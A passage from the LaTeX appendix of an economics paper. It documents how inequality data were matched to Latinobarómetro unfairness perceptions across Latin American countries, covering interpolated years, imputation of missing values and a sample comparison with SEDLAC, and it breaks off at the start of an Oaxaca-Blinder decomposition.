Mexico & 2009 & 2008 \\
Mexico & 2011 & 2012 \\
Mexico & 2015 & 2014 \\
Nicaragua & 1997 & 1998 \\
Nicaragua & 2007 & 2005 \\
Nicaragua & 2015 & 2014 \\
Venezuela & 2013 & 2012 \\
\midrule
\end{tabular}
\end{center}
\begin{singlespace} \vspace{-.5cm}
\noindent \justify
\end{singlespace}
}
\end{table}
Our second partial fix involves interpolating inequality indicators for some years. For some countries, a few years had perceptions data available but no comparable household survey in that year or in an adjacent one. In these cases, and to analyze the same set of countries every year, we linearly interpolated the inequality indicators (see Appendix Table \ref{tab-interp}).
\begin{table}[htbp]{\footnotesize
\begin{center}
\caption{Years in which inequality indicators were calculated with a linear interpolation}\label{tab-interp}
\begin{tabular}{ll}
\midrule
Country & Years interpolated \\
\midrule
Argentina & 1997, 2001, and 2002 \\
Bolivia & 2010 \\
Brazil & 2010 \\
Chile & 2010 \\
Colombia & 1997 \\
Costa Rica & 1997, 2001, 2002, 2007, and 2009 \\
Ecuador & 1997, 2001 \\
Guatemala & 1997, 2002, 2009, 2010, and 2013 \\
Mexico & 2013 \\
Nicaragua & 2002, 2010, 2011, and 2013 \\
Panama & 1997, 2001, 2002, and 2007 \\
Peru & 1997, 2001, 2002 \\
Venezuela & 2015 \\
\midrule
\end{tabular}
\end{center}
\begin{singlespace} \vspace{-.5cm}
\noindent \justify
\end{singlespace}
}
\end{table}
Overall, the years in which income inequality was calculated using linear interpolations represent a relatively small share of the total data points (17\% of the total). The majority of our inequality data points (69\%) are calculated using a household survey from the same year in which the perceptions polls were conducted, while the remaining 14\% of our inequality indicators are calculated using household surveys from adjacent years. Table \ref{tab-summ-data} summarizes the data sources used in the years in which perceptions data are available.
\begin{table}[htbp]{\footnotesize
\begin{center}
\caption{Summary of the data used in every country-year}\label{tab-summ-data}
\begin{tabular}{r|r|llllllll}
\multicolumn{1}{r}{} & \multicolumn{1}{r}{1997} & \multicolumn{1}{r}{2001} & \multicolumn{1}{r}{2002} & \multicolumn{1}{r}{2007} & \multicolumn{1}{r}{2009} & \multicolumn{1}{r}{2010} & \multicolumn{1}{r}{2011} & \multicolumn{1}{r}{2013} & \multicolumn{1}{r}{2015} \\
\cmidrule{2-10} \multicolumn{1}{l|}{Argentina} & \cellcolor[rgb]{ .608, .733, .349}\textcolor[rgb]{ .608, .733, .349}{3} & \multicolumn{1}{r|}{\cellcolor[rgb]{ .608, .733, .349}\textcolor[rgb]{ .608, .733, .349}{3}} & \multicolumn{1}{r|}{\cellcolor[rgb]{ .608, .733, .349}\textcolor[rgb]{ .608, .733, .349}{3}} & \multicolumn{1}{r|}{\cellcolor[rgb]{ .31, .506, .741}\textcolor[rgb]{ .31, .506, .741}{1}} & \multicolumn{1}{r|}{\cellcolor[rgb]{ .31, .506, .741}\textcolor[rgb]{ .31, .506, .741}{1}} & \multicolumn{1}{r|}{\cellcolor[rgb]{ .31, .506, .741}\textcolor[rgb]{ .31, .506, .741}{1}} & \multicolumn{1}{r|}{\cellcolor[rgb]{ .31, .506, .741}\textcolor[rgb]{ .31, .506, .741}{1}} & \multicolumn{1}{r|}{\cellcolor[rgb]{ .31, .506, .741}\textcolor[rgb]{ .31, .506, .741}{1}} & \multicolumn{1}{r|}{\cellcolor[rgb]{ .969, .588, .275}\textcolor[rgb]{ .969, .588, .275}{2}} \\
\cmidrule{2-10} \multicolumn{1}{l|}{Bolivia} & \cellcolor[rgb]{ .31, .506, .741}\textcolor[rgb]{ .31, .506, .741}{1} & \multicolumn{1}{r|}{\cellcolor[rgb]{ .31, .506, .741}\textcolor[rgb]{ .31, .506, .741}{1}} & \multicolumn{1}{r|}{\cellcolor[rgb]{ .31, .506, .741}\textcolor[rgb]{ .31, .506, .741}{1}} & \multicolumn{1}{r|}{\cellcolor[rgb]{ .31, .506, .741}\textcolor[rgb]{ .31, .506, .741}{1}} & \multicolumn{1}{r|}{\cellcolor[rgb]{ .31, .506, .741}\textcolor[rgb]{ .31, .506, .741}{1}} & \multicolumn{1}{r|}{\cellcolor[rgb]{ .608, .733, .349}\textcolor[rgb]{ .608, .733, .349}{3}} & \multicolumn{1}{r|}{\cellcolor[rgb]{ .31, .506, .741}\textcolor[rgb]{ .31, .506, .741}{1}} & \multicolumn{1}{r|}{\cellcolor[rgb]{ .31, .506, .741}\textcolor[rgb]{ .31, .506, .741}{1}} & \multicolumn{1}{r|}{\cellcolor[rgb]{ .31, .506, .741}\textcolor[rgb]{ .31, .506, .741}{1}} \\
\cmidrule{2-10} \multicolumn{1}{l|}{Brazil} & \cellcolor[rgb]{ .31, .506, .741}\textcolor[rgb]{ .31, .506, .741}{1} & \multicolumn{1}{r|}{\cellcolor[rgb]{ .31, .506, .741}\textcolor[rgb]{ .31, .506, .741}{1}} & \multicolumn{1}{r|}{\cellcolor[rgb]{ .31, .506, .741}\textcolor[rgb]{ .31, .506, .741}{1}} & \multicolumn{1}{r|}{\cellcolor[rgb]{ .31, .506, .741}\textcolor[rgb]{ .31, .506, .741}{1}} & \multicolumn{1}{r|}{\cellcolor[rgb]{ .31, .506, .741}\textcolor[rgb]{ .31, .506, .741}{1}} & \multicolumn{1}{r|}{\cellcolor[rgb]{ .608, .733, .349}\textcolor[rgb]{ .608, .733, .349}{3}} & \multicolumn{1}{r|}{\cellcolor[rgb]{ .31, .506, .741}\textcolor[rgb]{ .31, .506, .741}{1}} & \multicolumn{1}{r|}{\cellcolor[rgb]{ .31, .506, .741}\textcolor[rgb]{ .31, .506, .741}{1}} & \multicolumn{1}{r|}{\cellcolor[rgb]{ .31, .506, .741}\textcolor[rgb]{ .31, .506, .741}{1}} \\
\cmidrule{2-10} \multicolumn{1}{l|}{Chile} & \cellcolor[rgb]{ .969, .588, .275}\textcolor[rgb]{ .969, .588, .275}{2} & \multicolumn{1}{r|}{\cellcolor[rgb]{ .969, .588, .275}\textcolor[rgb]{ .969, .588, .275}{2}} & \multicolumn{1}{r|}{\cellcolor[rgb]{ .969, .588, .275}\textcolor[rgb]{ .969, .588, .275}{2}} & \multicolumn{1}{r|}{\cellcolor[rgb]{ .969, .588, .275}\textcolor[rgb]{ .969, .588, .275}{2}} & \multicolumn{1}{r|}{\cellcolor[rgb]{ .31, .506, .741}\textcolor[rgb]{ .31, .506, .741}{1}} & \multicolumn{1}{r|}{\cellcolor[rgb]{ .608, .733, .349}\textcolor[rgb]{ .608, .733, .349}{3}} & \multicolumn{1}{r|}{\cellcolor[rgb]{ .31, .506, .741}\textcolor[rgb]{ .31, .506, .741}{1}} & \multicolumn{1}{r|}{\cellcolor[rgb]{ .31, .506, .741}\textcolor[rgb]{ .31, .506, .741}{1}} & \multicolumn{1}{r|}{\cellcolor[rgb]{ .31, .506, .741}\textcolor[rgb]{ .31, .506, .741}{1}} \\
\cmidrule{2-10} \multicolumn{1}{l|}{Colombia} & \cellcolor[rgb]{ .608, .733, .349}\textcolor[rgb]{ .608, .733, .349}{3} & \multicolumn{1}{r|}{\cellcolor[rgb]{ .31, .506, .741}\textcolor[rgb]{ .31, .506, .741}{1}} & \multicolumn{1}{r|}{\cellcolor[rgb]{ .31, .506, .741}\textcolor[rgb]{ .31, .506, .741}{1}} & \multicolumn{1}{r|}{\cellcolor[rgb]{ .969, .588, .275}\textcolor[rgb]{ .969, .588, .275}{2}} & \multicolumn{1}{r|}{\cellcolor[rgb]{ .31, .506, .741}\textcolor[rgb]{ .31, .506, .741}{1}} & \multicolumn{1}{r|}{\cellcolor[rgb]{ .31, .506, .741}\textcolor[rgb]{ .31, .506, .741}{1}} & \multicolumn{1}{r|}{\cellcolor[rgb]{ .31, .506, .741}\textcolor[rgb]{ .31, .506, .741}{1}} & \multicolumn{1}{r|}{\cellcolor[rgb]{ .31, .506, .741}\textcolor[rgb]{ .31, .506, .741}{1}} & \multicolumn{1}{r|}{\cellcolor[rgb]{ .31, .506, .741}\textcolor[rgb]{ .31, .506, .741}{1}} \\
\cmidrule{2-10} \multicolumn{1}{l|}{Costa Rica} & \cellcolor[rgb]{ .608, .733, .349}\textcolor[rgb]{ .608, .733, .349}{3} & \multicolumn{1}{r|}{\cellcolor[rgb]{ .608, .733, .349}\textcolor[rgb]{ .608, .733, .349}{3}} & \multicolumn{1}{r|}{\cellcolor[rgb]{ .608, .733, .349}\textcolor[rgb]{ .608, .733, .349}{3}} & \multicolumn{1}{r|}{\cellcolor[rgb]{ .608, .733, .349}\textcolor[rgb]{ .608, .733, .349}{3}} & \multicolumn{1}{r|}{\cellcolor[rgb]{ .608, .733, .349}\textcolor[rgb]{ .608, .733, .349}{3}} & \multicolumn{1}{r|}{\cellcolor[rgb]{ .31, .506, .741}\textcolor[rgb]{ .31, .506, .741}{1}} & \multicolumn{1}{r|}{\cellcolor[rgb]{ .31, .506, .741}\textcolor[rgb]{ .31, .506, .741}{1}} & \multicolumn{1}{r|}{\cellcolor[rgb]{ .31, .506, .741}\textcolor[rgb]{ .31, .506, .741}{1}} & \multicolumn{1}{r|}{\cellcolor[rgb]{ .31, .506, .741}\textcolor[rgb]{ .31, .506, .741}{1}} \\
\cmidrule{2-10} \multicolumn{1}{l|}{Dominican Rep.} & \cellcolor[rgb]{ .749, .749, .749}\textcolor[rgb]{ .749, .749, .749}{0} & \multicolumn{1}{r|}{\cellcolor[rgb]{ .31, .506, .741}\textcolor[rgb]{ .31, .506, .741}{1}} & \multicolumn{1}{r|}{\cellcolor[rgb]{ .31, .506, .741}\textcolor[rgb]{ .31, .506, .741}{1}} & \multicolumn{1}{r|}{\cellcolor[rgb]{ .31, .506, .741}\textcolor[rgb]{ .31, .506, .741}{1}} & \multicolumn{1}{r|}{\cellcolor[rgb]{ .31, .506, .741}\textcolor[rgb]{ .31, .506, .741}{1}} & \multicolumn{1}{r|}{\cellcolor[rgb]{ .31, .506, .741}\textcolor[rgb]{ .31, .506, .741}{1}} & \multicolumn{1}{r|}{\cellcolor[rgb]{ .31, .506, .741}\textcolor[rgb]{ .31, .506, .741}{1}} & \multicolumn{1}{r|}{\cellcolor[rgb]{ .31, .506, .741}\textcolor[rgb]{ .31, .506, .741}{1}} & \multicolumn{1}{r|}{\cellcolor[rgb]{ .31, .506, .741}\textcolor[rgb]{ .31, .506, .741}{1}} \\
\cmidrule{2-10} \multicolumn{1}{l|}{Ecuador} & \cellcolor[rgb]{ .608, .733, .349}\textcolor[rgb]{ .608, .733, .349}{3} & \multicolumn{1}{r|}{\cellcolor[rgb]{ .608, .733, .349}\textcolor[rgb]{ .608, .733, .349}{3}} & \multicolumn{1}{r|}{\cellcolor[rgb]{ .969, .588, .275}\textcolor[rgb]{ .969, .588, .275}{2}} & \multicolumn{1}{r|}{\cellcolor[rgb]{ .31, .506, .741}\textcolor[rgb]{ .31, .506, .741}{1}} & \multicolumn{1}{r|}{\cellcolor[rgb]{ .31, .506, .741}\textcolor[rgb]{ .31, .506, .741}{1}} & \multicolumn{1}{r|}{\cellcolor[rgb]{ .31, .506, .741}\textcolor[rgb]{ .31, .506, .741}{1}} & \multicolumn{1}{r|}{\cellcolor[rgb]{ .31, .506, .741}\textcolor[rgb]{ .31, .506, .741}{1}} & \multicolumn{1}{r|}{\cellcolor[rgb]{ .31, .506, .741}\textcolor[rgb]{ .31, .506, .741}{1}} & \multicolumn{1}{r|}{\cellcolor[rgb]{ .31, .506, .741}\textcolor[rgb]{ .31, .506, .741}{1}} \\
\cmidrule{2-10} \multicolumn{1}{l|}{El Salvador} & \cellcolor[rgb]{ .31, .506, .741}\textcolor[rgb]{ .31, .506, .741}{1} & \multicolumn{1}{r|}{\cellcolor[rgb]{ .31, .506, .741}\textcolor[rgb]{ .31, .506, .741}{1}} & \multicolumn{1}{r|}{\cellcolor[rgb]{ .31, .506, .741}\textcolor[rgb]{ .31, .506, .741}{1}} & \multicolumn{1}{r|}{\cellcolor[rgb]{ .31, .506, .741}\textcolor[rgb]{ .31, .506, .741}{1}} & \multicolumn{1}{r|}{\cellcolor[rgb]{ .31, .506, .741}\textcolor[rgb]{ .31, .506, .741}{1}} & \multicolumn{1}{r|}{\cellcolor[rgb]{ .31, .506, .741}\textcolor[rgb]{ .31, .506, .741}{1}} & \multicolumn{1}{r|}{\cellcolor[rgb]{ .31, .506, .741}\textcolor[rgb]{ .31, .506, .741}{1}} & \multicolumn{1}{r|}{\cellcolor[rgb]{ .31, .506, .741}\textcolor[rgb]{ .31, .506, .741}{1}} & \multicolumn{1}{r|}{\cellcolor[rgb]{ .31, .506, .741}\textcolor[rgb]{ .31, .506, .741}{1}} \\
\cmidrule{2-10} \multicolumn{1}{l|}{Guatemala} & \cellcolor[rgb]{ .969, .588, .275}\textcolor[rgb]{ .969, .588, .275}{2} & \multicolumn{1}{r|}{\cellcolor[rgb]{ .969, .588, .275}\textcolor[rgb]{ .969, .588, .275}{2}} & \multicolumn{1}{r|}{\cellcolor[rgb]{ .608, .733, .349}\textcolor[rgb]{ .608, .733, .349}{3}} & \multicolumn{1}{r|}{\cellcolor[rgb]{ .969, .588, .275}\textcolor[rgb]{ .969, .588, .275}{2}} & \multicolumn{1}{r|}{\cellcolor[rgb]{ .608, .733, .349}\textcolor[rgb]{ .608, .733, .349}{3}} & \multicolumn{1}{r|}{\cellcolor[rgb]{ .608, .733, .349}\textcolor[rgb]{ .608, .733, .349}{3}} & \multicolumn{1}{r|}{\cellcolor[rgb]{ .31, .506, .741}\textcolor[rgb]{ .31, .506, .741}{1}} & \multicolumn{1}{r|}{\cellcolor[rgb]{ .608, .733, .349}\textcolor[rgb]{ .608, .733, .349}{3}} & \multicolumn{1}{r|}{\cellcolor[rgb]{ .969, .588, .275}\textcolor[rgb]{ .969, .588, .275}{2}} \\
\cmidrule{2-10} \multicolumn{1}{l|}{Honduras} & \cellcolor[rgb]{ .31, .506, .741}\textcolor[rgb]{ .31, .506, .741}{1} & \multicolumn{1}{r|}{\cellcolor[rgb]{ .31, .506, .741}\textcolor[rgb]{ .31, .506, .741}{1}} & \multicolumn{1}{r|}{\cellcolor[rgb]{ .31, .506, .741}\textcolor[rgb]{ .31, .506, .741}{1}} & \multicolumn{1}{r|}{\cellcolor[rgb]{ .31, .506, .741}\textcolor[rgb]{ .31, .506, .741}{1}} & \multicolumn{1}{r|}{\cellcolor[rgb]{ .31, .506, .741}\textcolor[rgb]{ .31, .506, .741}{1}} & \multicolumn{1}{r|}{\cellcolor[rgb]{ .31, .506, .741}\textcolor[rgb]{ .31, .506, .741}{1}} & \multicolumn{1}{r|}{\cellcolor[rgb]{ .31, .506, .741}\textcolor[rgb]{ .31, .506, .741}{1}} & \multicolumn{1}{r|}{\cellcolor[rgb]{ .31, .506, .741}\textcolor[rgb]{ .31, .506, .741}{1}} & \multicolumn{1}{r|}{\cellcolor[rgb]{ .31, .506, .741}\textcolor[rgb]{ .31, .506, .741}{1}} \\
\cmidrule{2-10} \multicolumn{1}{l|}{Mexico} & \cellcolor[rgb]{ .969, .588, .275}\textcolor[rgb]{ .969, .588, .275}{2} & \multicolumn{1}{r|}{\cellcolor[rgb]{ .969, .588, .275}\textcolor[rgb]{ .969, .588, .275}{2}} & \multicolumn{1}{r|}{\cellcolor[rgb]{ .31, .506, .741}\textcolor[rgb]{ .31, .506, .741}{1}} & \multicolumn{1}{r|}{\cellcolor[rgb]{ .969, .588, .275}\textcolor[rgb]{ .969, .588, .275}{2}} & \multicolumn{1}{r|}{\cellcolor[rgb]{ .969, .588, .275}\textcolor[rgb]{ .969, .588, .275}{2}} & \multicolumn{1}{r|}{\cellcolor[rgb]{ .31, .506, .741}\textcolor[rgb]{ .31, .506, .741}{1}} & \multicolumn{1}{r|}{\cellcolor[rgb]{ .969, .588, .275}\textcolor[rgb]{ .969, .588, .275}{2}} & \multicolumn{1}{r|}{\cellcolor[rgb]{ .608, .733, .349}\textcolor[rgb]{ .608, .733, .349}{3}} & \multicolumn{1}{r|}{\cellcolor[rgb]{ .969, .588, .275}\textcolor[rgb]{ .969, .588, .275}{2}} \\
\cmidrule{2-10} \multicolumn{1}{l|}{Nicaragua} & \cellcolor[rgb]{ .969, .588, .275}\textcolor[rgb]{ .969, .588, .275}{2} & \multicolumn{1}{r|}{\cellcolor[rgb]{ .31, .506, .741}\textcolor[rgb]{ .31, .506, .741}{1}} & \multicolumn{1}{r|}{\cellcolor[rgb]{ .608, .733, .349}\textcolor[rgb]{ .608, .733, .349}{3}} & \multicolumn{1}{r|}{\cellcolor[rgb]{ .969, .588, .275}\textcolor[rgb]{ .969, .588, .275}{2}} & \multicolumn{1}{r|}{\cellcolor[rgb]{ .31, .506, .741}\textcolor[rgb]{ .31, .506, .741}{1}} & \multicolumn{1}{r|}{\cellcolor[rgb]{ .608, .733, .349}\textcolor[rgb]{ .608, .733, .349}{3}} & \multicolumn{1}{r|}{\cellcolor[rgb]{ .608, .733, .349}\textcolor[rgb]{ .608, .733, .349}{3}} & \multicolumn{1}{r|}{\cellcolor[rgb]{ .608, .733, .349}\textcolor[rgb]{ .608, .733, .349}{3}} & \multicolumn{1}{r|}{\cellcolor[rgb]{ .969, .588, .275}\textcolor[rgb]{ .969, .588, .275}{2}} \\
\cmidrule{2-10} \multicolumn{1}{l|}{Panama} & \cellcolor[rgb]{ .608, .733, .349}\textcolor[rgb]{ .608, .733, .349}{3} & \multicolumn{1}{r|}{\cellcolor[rgb]{ .608, .733, .349}\textcolor[rgb]{ .608, .733, .349}{3}} & \multicolumn{1}{r|}{\cellcolor[rgb]{ .608, .733, .349}\textcolor[rgb]{ .608, .733, .349}{3}} & \multicolumn{1}{r|}{\cellcolor[rgb]{ .608, .733, .349}\textcolor[rgb]{ .608, .733, .349}{3}} & \multicolumn{1}{r|}{\cellcolor[rgb]{ .31, .506, .741}\textcolor[rgb]{ .31, .506, .741}{1}} & \multicolumn{1}{r|}{\cellcolor[rgb]{ .31, .506, .741}\textcolor[rgb]{ .31, .506, .741}{1}} & \multicolumn{1}{r|}{\cellcolor[rgb]{ .31, .506, .741}\textcolor[rgb]{ .31, .506, .741}{1}} & \multicolumn{1}{r|}{\cellcolor[rgb]{ .31, .506, .741}\textcolor[rgb]{ .31, .506, .741}{1}} & \multicolumn{1}{r|}{\cellcolor[rgb]{ .31, .506, .741}\textcolor[rgb]{ .31, .506, .741}{1}} \\
\cmidrule{2-10} \multicolumn{1}{l|}{Paraguay} & \cellcolor[rgb]{ .31, .506, .741}\textcolor[rgb]{ .31, .506, .741}{1} & \multicolumn{1}{r|}{\cellcolor[rgb]{ .31, .506, .741}\textcolor[rgb]{ .31, .506, .741}{1}} & \multicolumn{1}{r|}{\cellcolor[rgb]{ .31, .506, .741}\textcolor[rgb]{ .31, .506, .741}{1}} & \multicolumn{1}{r|}{\cellcolor[rgb]{ .31, .506, .741}\textcolor[rgb]{ .31, .506, .741}{1}} & \multicolumn{1}{r|}{\cellcolor[rgb]{ .31, .506, .741}\textcolor[rgb]{ .31, .506, .741}{1}} & \multicolumn{1}{r|}{\cellcolor[rgb]{ .31, .506, .741}\textcolor[rgb]{ .31, .506, .741}{1}} & \multicolumn{1}{r|}{\cellcolor[rgb]{ .31, .506, .741}\textcolor[rgb]{ .31, .506, .741}{1}} & \multicolumn{1}{r|}{\cellcolor[rgb]{ .31, .506, .741}\textcolor[rgb]{ .31, .506, .741}{1}} & \multicolumn{1}{r|}{\cellcolor[rgb]{ .31, .506, .741}\textcolor[rgb]{ .31, .506, .741}{1}} \\
\cmidrule{2-10} \multicolumn{1}{l|}{Peru} & \cellcolor[rgb]{ .969, .588, .275}\textcolor[rgb]{ .969, .588, .275}{2} & \multicolumn{1}{r|}{\cellcolor[rgb]{ .31, .506, .741}\textcolor[rgb]{ .31, .506, .741}{1}} & \multicolumn{1}{r|}{\cellcolor[rgb]{ .31, .506, .741}\textcolor[rgb]{ .31, .506, .741}{1}} & \multicolumn{1}{r|}{\cellcolor[rgb]{ .31, .506, .741}\textcolor[rgb]{ .31, .506, .741}{1}} & \multicolumn{1}{r|}{\cellcolor[rgb]{ .31, .506, .741}\textcolor[rgb]{ .31, .506, .741}{1}} & \multicolumn{1}{r|}{\cellcolor[rgb]{ .31, .506, .741}\textcolor[rgb]{ .31, .506, .741}{1}} & \multicolumn{1}{r|}{\cellcolor[rgb]{ .31, .506, .741}\textcolor[rgb]{ .31, .506, .741}{1}} & \multicolumn{1}{r|}{\cellcolor[rgb]{ .31, .506, .741}\textcolor[rgb]{ .31, .506, .741}{1}} & \multicolumn{1}{r|}{\cellcolor[rgb]{ .31, .506, .741}\textcolor[rgb]{ .31, .506, .741}{1}} \\
\cmidrule{2-10} \multicolumn{1}{l|}{Uruguay} & \cellcolor[rgb]{ .31, .506, .741}\textcolor[rgb]{ .31, .506, .741}{1} & \multicolumn{1}{r|}{\cellcolor[rgb]{ .31, .506, .741}\textcolor[rgb]{ .31, .506, .741}{1}} & \multicolumn{1}{r|}{\cellcolor[rgb]{ .31, .506, .741}\textcolor[rgb]{ .31, .506, .741}{1}} & \multicolumn{1}{r|}{\cellcolor[rgb]{ .31, .506, .741}\textcolor[rgb]{ .31, .506, .741}{1}} & \multicolumn{1}{r|}{\cellcolor[rgb]{ .31, .506, .741}\textcolor[rgb]{ .31, .506, .741}{1}} & \multicolumn{1}{r|}{\cellcolor[rgb]{ .31, .506, .741}\textcolor[rgb]{ .31, .506, .741}{1}} & \multicolumn{1}{r|}{\cellcolor[rgb]{ .31, .506, .741}\textcolor[rgb]{ .31, .506, .741}{1}} & \multicolumn{1}{r|}{\cellcolor[rgb]{ .31, .506, .741}\textcolor[rgb]{ .31, .506, .741}{1}} & \multicolumn{1}{r|}{\cellcolor[rgb]{ .31, .506, .741}\textcolor[rgb]{ .31, .506, .741}{1}} \\
\cmidrule{2-10} \multicolumn{1}{l|}{Venezuela} & \cellcolor[rgb]{ .31, .506, .741}\textcolor[rgb]{ .31, .506, .741}{1} & \multicolumn{1}{r|}{\cellcolor[rgb]{ .31, .506, .741}\textcolor[rgb]{ .31, .506, .741}{1}} & \multicolumn{1}{r|}{\cellcolor[rgb]{ .31, .506, .741}\textcolor[rgb]{ .31, .506, .741}{1}} & \multicolumn{1}{r|}{\cellcolor[rgb]{ .31, .506, .741}\textcolor[rgb]{ .31, .506, .741}{1}} & \multicolumn{1}{r|}{\cellcolor[rgb]{ .31, .506, .741}\textcolor[rgb]{ .31, .506, .741}{1}} & \multicolumn{1}{r|}{\cellcolor[rgb]{ .31, .506, .741}\textcolor[rgb]{ .31, .506, .741}{1}} & \multicolumn{1}{r|}{\cellcolor[rgb]{ .31, .506, .741}\textcolor[rgb]{ .31, .506, .741}{1}} & \multicolumn{1}{r|}{\cellcolor[rgb]{ .969, .588, .275}\textcolor[rgb]{ .969, .588, .275}{2}} & \multicolumn{1}{r|}{\cellcolor[rgb]{ .608, .733, .349}\textcolor[rgb]{ .608, .733, .349}{3}} \\
\cmidrule{2-10} \multicolumn{1}{r}{} & \multicolumn{1}{r}{} & & & & & & & & \\
\cmidrule{2-2} & \cellcolor[rgb]{ .31, .506, .741} & \multicolumn{8}{l}{Both perceptions and inequality data available} \\
\cmidrule{2-2} & \cellcolor[rgb]{ .969, .588, .275} & \multicolumn{8}{l}{Inequality was calculated with a close survey} \\
\cmidrule{2-2} & \cellcolor[rgb]{ .608, .733, .349} & \multicolumn{8}{l}{Inequality was calculated with a linear interpolation} \\
\cmidrule{2-2} & \cellcolor[rgb]{ .749, .749, .749} & \multicolumn{8}{l}{Latinobar\'ometro did not conduct survey in this year} \\
\cmidrule{2-2} \end{tabular}%
\end{center}
\begin{singlespace} \vspace{-.5cm}
\noindent \justify
\end{singlespace}
}
\end{table}
\subsection{Imputation of Missing Values for the Regression Analysis}
Two of our individual-level variables (political ideology and religion) have many missing values in some country-years. To deal with this in our regressions, we imputed the average value of each variable to individuals with a missing value. In those cases, we included in the regression a dummy that takes the value one if the value of the variable was imputed and zero otherwise. The results are similar if we do not impute the values, but the sample size of the regressions is smaller.
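A minimal sketch of this imputation scheme follows; the variable and its values are hypothetical.

```python
# Sketch of the imputation used in the regressions: missing values get
# the sample mean of the observed values, plus an indicator that flags
# imputed observations so the regression can absorb any level shift.

def impute_with_flag(values):
    """Replace None with the mean of the observed values; return the
    filled series together with a 0/1 imputation dummy."""
    observed = [v for v in values if v is not None]
    mean = sum(observed) / len(observed)
    filled = [mean if v is None else v for v in values]
    dummy = [1 if v is None else 0 for v in values]
    return filled, dummy

ideology = [3, None, 7, 5]          # e.g. a left-right scale with a gap
filled, was_imputed = impute_with_flag(ideology)
```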
\subsection{Comparison between Latinobar\'ometro's and SEDLAC's samples} \label{app_lb_sedlac}
To assess whether there are systematic differences between Latinobar\'ometro's sample and the household surveys' sample, in Appendix Table \ref{tab-lat-sedlac} we compare a set of variables available in both datasets during 2013. To ensure comparability across databases, we restrict the calculations to individuals over age 18 and countries with data available in both harmonization projects.
In general, the samples are similar in observable characteristics. For instance, the average age in Latinobar\'ometro's 2013 sample is 40.6 years, while in SEDLAC it is 42.7 years. Similarly, the percentage of males is 48.9\% in Latinobar\'ometro and 47.6\% in SEDLAC. The main difference arises from educational attainment. On average, the SEDLAC sample is more educated: 46.1\% of the population has secondary education or more, while this figure is 38.8\% in Latinobar\'ometro.
\begin{table}[H]{\scriptsize
\begin{center}
\caption{Descriptive statistics in Latinobar\'ometro and SEDLAC, 2013 (selected countries)} \label{tab-lat-sedlac}
\begin{tabular}{lcccccccc}
\midrule
& \multicolumn{2}{c}{Mean} & & \multicolumn{2}{c}{Standard Dev.} & & \multicolumn{2}{c}{Observations} \\
\cmidrule{2-3}\cmidrule{5-6}\cmidrule{8-9} & Latinob. & SEDLAC & & Latinob. & SEDLAC & & Latinob. & SEDLAC \\
& (1) & (2) & & (3) & (4) & & (5) & (6) \\
\midrule
\textbf{\hspace{-1em} Panel A. Sociodemographic} & & & & & & & & \\
Age & 40.59 & 42.68 & & 16.43 & 17.25 & & 14,855 & 1,004,894 \\
Male (\%) & 48.97 & 47.63 & & 0.50 & 0.50 & & 14,855 & 1,004,894 \\
Married or civil union (\%) & 56.77 & 36.41 & & 0.50 & 0.48 & & 14,804 & 915,117 \\
\multicolumn{3}{l}{\textbf{\hspace{-1em} Panel B. Education and Labor market}} & & & & & & \\
Literate (\%) & 91.18 & 92.17 & & 0.28 & 0.27 & & 14,855 & 1,004,744 \\
Secondary education or more (\%) & 38.83 & 46.11 & & 0.49 & 0.50 & & 14,855 & 1,001,672 \\
Economically active (\%) & 65.14 & 68.66 & & 0.48 & 0.46 & & 14,855 & 1,004,718 \\
Unemployed (\%) & 5.78 & 4.08 & & 0.23 & 0.20 & & 14,855 & 1,004,718 \\
\textbf{\hspace{-1em} Panel C. Assets and Services} & & & & & & & & \\
Access to a sewerage (\%) & 68.76 & 63.41 & & 0.46 & 0.48 & & 13,799 & 975,726 \\
Car (\%) & 26.37 & 21.09 & & 0.44 & 0.41 & & 11,612 & 643,350 \\
Computer (\%) & 46.55 & 47.82 & & 0.50 & 0.50 & & 12,747 & 894,003 \\
Fridge (\%) & 82.76 & 88.89 & & 0.38 & 0.31 & & 12,763 & 894,003 \\
Homeowner (\%) & 74.09 & 69.64 & & 0.44 & 0.46 & & 14,761 & 1,003,306 \\
Mobile (\%) & 86.91 & 91.78 & & 0.34 & 0.27 & & 12,754 & 896,079 \\
Washing machine (\%) & 60.49 & 56.88 & & 0.49 & 0.50 & & 11,816 & 848,350 \\
Landline (\%) & 40.22 & 39.47 & & 0.49 & 0.49 & & 12,736 & 896,425 \\
\midrule
\end{tabular}
\end{center}
\begin{singlespace}
\noindent \justify \textbf{Note:} This table compares the observable characteristics of individuals in Latinobar\'ometro and SEDLAC. Summary statistics were calculated on a restricted sample (individuals aged over 18) to ensure comparability between both datasets, pooling data from 14 countries in 2013: Argentina, Bolivia, Brazil, Chile, Colombia, Costa Rica, Dominican Republic, Ecuador, El Salvador, Honduras, Panama, Peru, Paraguay, and Uruguay.
\end{singlespace}
}
\end{table}
\section{The Oaxaca-Blinder Decomposition} \label{sec_oaxaca}
\setcounter{table}{0}
\setcounter{figure}{0}
\setcounter{equation}{0}
\renewcommand{\thetable}{C\arabic{table}}
\renewcommand{\thefigure}{C\arabic{figure}}
\renewcommand{\theequation}{C\arabic{equation}}
The starting point to decompose changes in unfairness perceptions between 2002 and 2013 is the following equation:
\begin{align}
\text{Unfair}_{ict} = \beta_t X_{ict} + \gamma_t \text{Gini}_{ct} + \varepsilon_{ict} \quad \text{for} \quad t \in \{2002, 2013\},
\end{align}
where $t$ indicates the year in which perceptions are elicited and $X_{ict}$ is a vector that contains individual-level controls. The fraction of individuals who perceive the income distribution as unfair in year $t$ can be calculated as
\begin{align}
\overline{\text{Unfair}}_{t} = \hat{\beta}_{t} \bar{X}_{t} + \hat{\gamma}_{t} \overline{\text{Gini}}_{t} \quad \text{for} \quad t \in \{2002, 2013\},
\end{align}
where $\bar{X}_t$ is a vector of the average values of the explanatory variables in year $t$, and $\hat{\beta}_t$ and $\hat{\gamma}_t$ are the OLS-estimated coefficients. The change in unfairness beliefs between 2013 and 2002 is given by
\begin{align} \label{eq-diff-fair}
\underbrace{\overline{\text{Unfair}}_{2013} - \overline{\text{Unfair}}_{2002}}_{\equiv \Delta \text{Unfair}} = (\hat{\beta}_{2013} \bar{X}_{2013} + \hat{\gamma}_{2013} \overline{\text{Gini}}_{2013}) - (\hat{\beta}_{2002} \bar{X}_{2002} + \hat{\gamma}_{2002} \overline{\text{Gini}}_{2002})
\end{align}
Adding and subtracting $\hat{\beta}_{2002} \bar{X}_{2013} + \hat{\gamma}_{2002} \overline{\text{Gini}}_{2013}$ to equation \eqref{eq-diff-fair} yields
\begin{align} \label{eq_oaxaca}
\Delta \text{Unfair} &=
